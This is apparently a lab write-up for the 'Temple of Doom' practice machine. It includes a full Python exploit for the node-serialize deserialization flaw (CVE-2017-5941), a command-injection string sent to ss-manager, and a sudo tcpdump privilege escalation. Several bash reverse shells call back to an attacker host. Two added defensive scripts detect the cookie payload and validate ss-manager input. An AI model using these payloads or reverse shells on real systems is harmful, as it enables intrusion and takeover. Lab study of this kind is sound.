25-temple-of-DOOM-v1


Information gathering

arp-scan -l
nmap --min-rate 100000 -p- 192.168.240.133
nmap --min-rate 100000 -p22,666 -A 192.168.240.133

dirsearch -u 192.168.240.133
dirb http://192.168.240.133/
nikto -host 192.168.240.133 -p 666

22/tcp open ssh
666/tcp open doom


Nmap scan report for 192.168.240.133
Host is up (0.00036s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 00:0C:29:D8:5F:B7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop


http://192.168.240.133:666 [200 OK] Cookies[profile], Country[RESERVED][ZZ], HttpOnly[profile], IP[192.168.240.133], X-Powered-By[Express]


┌──(root㉿penetration)-[/home/kali]
└─# nikto -host 192.168.240.133 -p 666
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.240.133
+ Target Hostname: 192.168.240.133
+ Target Port: 666
+ Start Time: 2024-12-01 16:18:10 (GMT8)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: Retrieved x-powered-by header: Express.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: GET, HEAD .
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8113 requests: 11 error(s) and 5 item(s) reported on remote host
+ End Time: 2024-12-01 16:18:24 (GMT8) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Penetration testing

Port 666

The service is a Node.js Express application, so look for Node.js vulnerabilities:
searchsploit nodejs
We need the remote code execution one.


# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
# Exploit Author: UndeadLarva
# Software Link: https://www.npmjs.com/package/node-serialize
# Version: 0.0.4
# CVE: CVE-2017-5941
# Ported to Python 3 (print and base64 handling); the logic is unchanged.

import requests
import base64
import sys

url = 'http://192.168.240.133:666/'  # change this

# JavaScript that node-serialize's unserialize() hands to eval(). It replaces
# ServerResponse.prototype.end, so the inner function (and the exec call) runs
# when the application calls res.end() for this request.
payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
           "return function () {"
           "['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
           "console.log('still inside');"
           "const { exec } = require('child_process');"
           "exec('bash -i >& /dev/tcp/192.168.240.130/1111 0>&1');"  # change this
           "}"
           "})(require('http').ServerResponse.prototype.end)")

# rce = "_$$ND_FUNC$$_process.exit(0)"
# code = "_$$ND_FUNC$$_console.log('behind you')"
# _$$ND_FUNC$$_ is the marker node-serialize uses for serialized functions.
code = "_$$ND_FUNC$$_" + payload

string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "' + code + '"}'

# The application reads the profile cookie as base64-encoded JSON.
cookie = {'profile': base64.b64encode(string.encode()).decode()}

try:
    response = requests.get(url, cookies=cookie).text
    print(response)
except requests.exceptions.RequestException as e:
    print('Oops!', e)
    sys.exit(1)
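As an added defender-side example (my own code, not part of the walkthrough or of the exploit above), this Python script decodes the base64 profile cookie the way the Express app does and flags any string carrying node-serialize's _$$ND_FUNC$$_ marker, which is what makes CVE-2017-5941 reachable; the sample cookies are constructed.

```python
import base64
import json
import re

# node-serialize prefixes serialized functions with this marker; unserialize()
# passes whatever follows it to eval(), so an expression such as an IIFE or an
# assignment runs at deserialization time (CVE-2017-5941).
ND_FUNC_MARKER = "_$$ND_FUNC$$_"
# A plain function literal is only defined, not called, when eval'd.
PLAIN_FUNCTION_RE = re.compile(r"function\s*\([^)]*\)\s*\{.*\}", re.S)

def decode_profile_cookie(cookie_value):
    """Base64-decode the 'profile' cookie and parse it as JSON; None if malformed."""
    try:
        raw = base64.b64decode(cookie_value, validate=True)
        return json.loads(raw.decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return None

def find_serialized_functions(obj, path="$"):
    """Walk the decoded object and report every string that starts with the marker."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            hits.extend(find_serialized_functions(value, f"{path}.{key}"))
    elif isinstance(obj, list):
        for idx, value in enumerate(obj):
            hits.extend(find_serialized_functions(value, f"{path}[{idx}]"))
    elif isinstance(obj, str) and obj.startswith(ND_FUNC_MARKER):
        body = obj[len(ND_FUNC_MARKER):]
        hits.append({"path": path,
                     "immediate": PLAIN_FUNCTION_RE.fullmatch(body) is None,
                     "preview": body[:60]})
    return hits

def scan_cookie(cookie_value):
    """Findings for one 'profile' cookie value (empty list means nothing suspicious)."""
    decoded = decode_profile_cookie(cookie_value)
    return [] if decoded is None else find_serialized_functions(decoded)

# Constructed samples: a normal profile and one carrying a serialized IIFE.
BENIGN = base64.b64encode(b'{"username":"alice","country":"NL"}').decode()
MALICIOUS = base64.b64encode(json.dumps(
    {"username": "x", "exec": "_$$ND_FUNC$$_function(){return 1}()"}).encode()).decode()

if __name__ == "__main__":
    for label, cookie in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, scan_cookie(cookie))
```

The same walk can be run over the profile cookies in access logs or a WAF feed; a hit with "immediate" set is code that executed the moment the server deserialized it.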


Privilege escalation

ls /home: found the fireman account.
ps aux | grep fireman: check whether that account has a process that could be used for privilege escalation.
This is a multi-user management process started with root privileges.


In the current shell, use nc against local UDP port 8839: nc -u 127.0.0.1 8839. Then send
add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"}
Look at /tmp afterwards and a new file called evil has appeared: whatever follows method is executed as a command, so swap it for a reverse shell.


(ss-manager) is owned by the fireman user, so we can use this flaw to pop another reverse shell,
which gives us the fireman user. We listen on port 1113 with nc -lvp 1113
and in the shell enter add: {"server_port":8004, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.240.130/1113 0>&1||"}

It took me several tries before the shell came back; now I have fireman's privileges.
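As an added defender-side example (my own code, not from the walkthrough or from shadowsocks), this Python validator parses ss-manager style add: {...} lines and rejects a method that is not an allowlisted cipher name, which is the check whose absence lets the ||...|| value above reach a shell; the cipher allowlist is an assumption and the sample lines are constructed.

```python
import json
import re

# Assumed allowlist of common shadowsocks-libev AEAD cipher names; extend to your build.
ALLOWED_METHODS = {"aes-128-gcm", "aes-192-gcm", "aes-256-gcm", "chacha20-ietf-poly1305"}
ALLOWED_COMMANDS = {"add", "remove", "ping"}
# Password characters that cannot terminate a shell word or smuggle an operator.
SAFE_PASSWORD_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")
LINE_RE = re.compile(r"\s*([a-z]+)\s*(?::\s*(\{.*\}))?\s*", re.S)

def parse_manager_line(line):
    """Split 'cmd: {json}' (or a bare 'ping') into (cmd, args); ValueError if malformed."""
    m = LINE_RE.fullmatch(line)
    if not m or m.group(1) not in ALLOWED_COMMANDS:
        raise ValueError("unknown or malformed manager command")
    args = json.loads(m.group(2)) if m.group(2) else {}
    if not isinstance(args, dict):
        raise ValueError("arguments must be a JSON object")
    return m.group(1), args

def validate_add(args):
    """Return the list of problems with an 'add' request (empty means accept)."""
    errors = []
    port = args.get("server_port")
    if isinstance(port, bool) or not isinstance(port, int) or not 1 <= port <= 65535:
        errors.append("server_port must be an integer in 1..65535")
    password = args.get("password")
    if not isinstance(password, str) or not SAFE_PASSWORD_RE.fullmatch(password):
        errors.append("password contains characters outside the safe set")
    if args.get("method") not in ALLOWED_METHODS:
        errors.append(f"method {args.get('method')!r} is not an allowed cipher")
    return errors

def check_line(line):
    """Accept or reject one manager line; returns (accepted, reason)."""
    try:
        cmd, args = parse_manager_line(line)
    except ValueError as exc:
        return False, str(exc)
    errors = validate_add(args) if cmd == "add" else []
    return (False, "; ".join(errors)) if errors else (True, "ok")

# Constructed samples: the injection shape from the walkthrough and a legitimate add.
INJECTED = 'add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"}'
LEGIT = 'add: {"server_port":8003, "password":"test", "method":"aes-256-gcm"}'

if __name__ == "__main__":
    for line in (INJECTED, LEGIT, "ping"):
        print(check_line(line))
```

Even with this check in place, a manager socket reachable by local users should not be running under an account with more privilege than the users who can write to it.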


sudo -l looks for files that allow privilege escalation. tcpdump has a known sudo escalation; https://gtfobins.github.io/ lets you search for such commands.



We have sudo rights, so use the sudo entry. This method also escalates through a reverse shell: first write the reverse shell into a file (again listening on an unused port) and put that file in /tmp (a directory that is usually writable by everyone).
echo "bash -i >& /dev/tcp/192.168.240.130/1114 0>&1" > /tmp/shell.sh
chmod +x /tmp/shell.sh
nc -lvvp 1114 (listener on the attacking machine)
The command provided needs a small modification:
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root (changed the interface: lo is the local loopback, eth0 is the external NIC)

